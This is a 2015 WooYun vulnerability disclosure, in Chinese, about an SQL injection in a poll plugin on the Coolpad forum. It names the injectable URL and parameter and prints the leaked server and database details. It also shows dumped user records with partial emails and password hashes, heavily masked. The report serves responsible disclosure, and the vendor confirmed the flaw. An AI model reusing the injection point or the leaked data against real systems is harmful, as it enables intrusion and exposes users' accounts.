乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-10: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经确认,细节仅向厂商公开 2015-01-24: 细节向核心白帽子及相关领域专家公开 2015-02-03: 细节向普通白帽子公开 2015-02-13: 细节向实习白帽子公开 2015-02-24: 细节向公众公开
酷派论坛高危注可导致全网6w多用户泄露
http://bbs.coolpad.com/poll/
酷派使用了discuz的xplus插件,主要功能是投票开始构造url。然后尝试注入。。根据自己搭建的结果,构造如下
http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31
choiceid存在注入
Target: http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31Host IP: 58.220.6.144Web Server: nginxDB Server: MySQLResp. Time(avg): 378 msCurrent User: [email protected]Sql Version: 5.6.15-logCurrent DB: coolpad_pollSystem User: [email protected]Host Name: coolyun-50-20Installation dir: \/usr\/coolpad\/Percona-Server-5.6.15-rel63.0DB User: 'coolpad_poll'@'192.168.0.11'Data Bases: information_schema coolpad_poll test
鉴于xplus用户数据适合discuz数据联通的,并且酷派论坛数据是好酷云主库联通的,可导致全网用户泄露由于是error based注入,所以脱裤没压力
*****d: ui********************=bbs@kefu********************sername********************0f3c10bfb4921******************** uid=1********************=wyd68@vi********************sername********************696018d26c305******************** uid=1********************=fred.sun********************sername********************a9a28672f6c07******************** uid=1********************=winny997********************sername********************3231004414094******************** uid=1********************il=mark7********************sername********************b680c59bbd5ba******************** uid=1********************erwengjuche********************rname=we********************1438934ff84df******************** uid=1********************il=ryyf@******************** usern********************4be28a9c0554c******************** uid=1********************=85890569********************sername********************e4b7d54d825a6******************** uid=1********************mail=fz********************e=\u771f\u********************3d2e2f69585a3******************** uid=1********************=12410240********************sername********************488c6f1f6607f******************** uid=1********************=zhenhao8********************rname=zh********************93f9b7e529dc1******************** uid=1********************il=cnoco********************rname=15********************09ca9871d98e4******************** uid=1********************=xs060025********************rname=an********************a48719b4f3477******************** uid=1********************=53079414********************ame=angel********************adfbc02567388******************** uid=1********************il=seko2********************sername********************1772f8dfb7635******************** uid=1********************il=13256********************rname=to********************767a9ed57c808******************** uid=1********************il=hhboy******************** usern********************d1b695060bc63******************** uid=1********************=tsfj_881******************** usern********************055dbf81fc657******************** uid=1********************=li810330********************sername********************c3010d0fb2463******************** uid=1********************il=zztel********************sername********************6adb2154c40f2******************** uid=1********************=51494104********************ame=\u917********************66e4885017a00******************** uid=1********************il=0001s********************sername********************156430e51cb85******************** uid=1********************=27292334********************sername********************1f18c4c2d862c******************** uid=1********************il=czjna********************sername********************f16d5a30cac32******************** uid=1********************il=wxkno********************sername********************e95d45a6ffb92******************** uid=1********************il=zs966********************sername********************8f4647b8e8ac2******************** uid=1********************=13378387********************sername********************246ce51754fc7******************** uid=1********************=lhf51729********************e=\u5389\u********************ebe6d32222eb2******************** uid=1********************il=doxin********************rname=do********************c52a7d7b54e03******************** uid=1**********。</**********^觉停了^**********^多^**********) from coolpad_po********************ult: *****
*****d: ui********************=bbs@kefu********************sername********************0f3c10bfb4921******************** uid=1********************=wyd68@vi********************sername********************696018d26c305******************** uid=1********************=fred.sun********************sername********************a9a28672f6c07******************** uid=1********************=winny997********************sername********************3231004414094******************** uid=1********************il=mark7********************sername********************b680c59bbd5ba******************** uid=1********************erwengjuche********************rname=we********************1438934ff84df******************** uid=1********************il=ryyf@******************** usern********************4be28a9c0554c******************** uid=1********************=85890569********************sername********************e4b7d54d825a6******************** uid=1********************mail=fz********************e=\u771f\u********************3d2e2f69585a3******************** uid=1********************=12410240********************sername********************488c6f1f6607f******************** uid=1********************=zhenhao8********************rname=zh********************93f9b7e529dc1******************** uid=1********************il=cnoco********************rname=15********************09ca9871d98e4******************** uid=1********************=xs060025********************rname=an********************a48719b4f3477******************** uid=1********************=53079414********************ame=angel********************adfbc02567388******************** uid=1********************il=seko2********************sername********************1772f8dfb7635******************** uid=1********************il=13256********************rname=to********************767a9ed57c808******************** uid=1********************il=hhboy******************** usern********************d1b695060bc63******************** uid=1********************=tsfj_881******************** usern********************055dbf81fc657******************** uid=1********************=li810330********************sername********************c3010d0fb2463******************** uid=1********************il=zztel********************sername********************6adb2154c40f2******************** uid=1********************=51494104********************ame=\u917********************66e4885017a00******************** uid=1********************il=0001s********************sername********************156430e51cb85******************** uid=1********************=27292334********************sername********************1f18c4c2d862c******************** uid=1********************il=czjna********************sername********************f16d5a30cac32******************** uid=1********************il=wxkno********************sername********************e95d45a6ffb92******************** uid=1********************il=zs966********************sername********************8f4647b8e8ac2******************** uid=1********************=13378387********************sername********************246ce51754fc7******************** uid=1********************=lhf51729********************e=\u5389\u********************ebe6d32222eb2******************** uid=1********************il=doxin********************rname=do********************c52a7d7b54e03******************** uid=1*****
危害等级:高
漏洞Rank:20
确认时间:2015-01-14 08:52
感谢关注酷派安全,已提交给业务方紧急处理。
暂无